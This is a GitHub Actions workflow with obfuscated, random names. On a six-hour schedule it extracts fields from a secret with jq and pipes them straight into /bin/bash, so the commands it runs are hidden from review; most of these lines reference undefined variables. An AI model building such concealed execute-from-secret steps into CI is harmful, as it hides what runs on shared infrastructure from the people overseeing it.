name: xilvyangkai
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xilvyangkai
        env:
          jyxu6: ${{ secrets.jyxu6 }}
        run: |
          echo $jyxu6 | jq -r .hsylt90 | /bin/bash
          echo $aenjn8293 | jq -r .dr77977 | /bin/bash
          echo $zwofq1508 | jq -r .p65685 | /bin/bash
          echo $potxi41311 | jq -r .iik59271 | /bin/bash
          echo $nch83827 | jq -r .gdctr87413 | /bin/bash
          echo $jasu84 | jq -r .u3096 | /bin/bash
          echo $kgr25 | jq -r .zgzmg433 | /bin/bash
          echo $jwep4 | jq -r .bmg016 | /bin/bash
          echo $imj1194 | jq -r .hoa3 | /bin/bash

